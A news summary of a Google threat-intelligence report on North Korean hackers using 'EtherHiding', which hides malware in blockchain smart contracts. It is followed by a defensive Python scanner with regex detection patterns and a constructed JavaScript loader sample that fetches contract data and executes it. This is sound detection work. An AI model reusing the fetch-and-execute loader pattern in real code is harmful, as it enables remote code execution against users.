Google reveals North Korean hackers are using EtherHiding, a blockchain-based technique, to deliver malware and steal cryptocurrency.
A North Korean threat actor has been found using a blockchain-based technique, known as ‘EtherHiding,’ to deliver malware to facilitate cryptocurrency theft.
EtherHiding is a technique where attackers embed malicious code, such as JavaScript payloads, inside a blockchain-based smart contract, effectively using the decentralized ledger as a resilient command-and-control (C2) server.
This is the first time Google Threat Intelligence Group (GTIG) has observed a nation-state actor adopting this method, it said in a blog post published on October 16.
Because the payload lives on a decentralized ledger rather than on a server that can be seized or blocklisted, EtherHiding is resilient against conventional takedown and blocklisting efforts, GTIG explained.
The threat intelligence group has tracked the threat actor UNC5342 since February 2026; the actor has incorporated EtherHiding into an ongoing social engineering campaign.
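As an added illustration of how a defender might triage for the loader pattern the article describes (my own heuristic example, not code from GTIG or its report), the scanner below flags in-page JavaScript that both reads smart-contract data over JSON-RPC and executes the result. The indicator regexes and the two sample snippets are constructed assumptions, not real indicators or payloads.

```python
import re

# Heuristic indicators for EtherHiding-style loaders. The indicator set is
# an assumption for illustration, not GTIG's detection logic. The key idea
# from the article: a script pulls data from a smart contract (used as C2)
# and turns the returned bytes into executable JavaScript.
INDICATORS = {
    # JSON-RPC read methods that return contract data to the browser
    "rpc_read": re.compile(r"eth_call|eth_getStorageAt|eth_getCode"),
    # something that looks like an EVM contract/account address
    "evm_address": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    # decoding returned hex into text before it is used
    "hex_decode": re.compile(r"hexToString|hexToUtf8|toUtf8String|fromCharCode"),
    # turning fetched text into running code
    "dynamic_exec": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(|document\.write\s*\("),
}

def scan_script(js_source):
    """Return the set of indicator names present in one script body."""
    return {name for name, rx in INDICATORS.items() if rx.search(js_source)}

def classify(js_source):
    """'suspicious' only when the script both reads contract data and executes
    the result; 'review' when it reads chain data but never executes it."""
    hits = scan_script(js_source)
    if {"rpc_read", "dynamic_exec"} <= hits:
        return "suspicious", hits
    if "rpc_read" in hits:
        return "review", hits
    return "benign", hits

# Constructed sample inputs (placeholder zero address, undefined rpc/sel):
LOADER_LIKE = """
const r = await fetch(rpc, {method:'POST', body: JSON.stringify({
  jsonrpc:'2.0', id:1, method:'eth_call',
  params:[{to:'0x0000000000000000000000000000000000000000', data:sel}, 'latest']})});
const out = (await r.json()).result;
new Function(hexToString(out))();
"""
DAPP_LIKE = """
const bal = await provider.call({to:'0x0000000000000000000000000000000000000000', data:sel});
document.getElementById('balance').textContent = bal;  // eth_call via provider
"""

if __name__ == "__main__":
    for label, src in (("loader-like", LOADER_LIKE), ("dapp-like", DAPP_LIKE)):
        print(label, *classify(src))
```

A legitimate dapp that reads balances will land in "review", so the combination with dynamic execution, not the RPC call alone, is what should drive an alert.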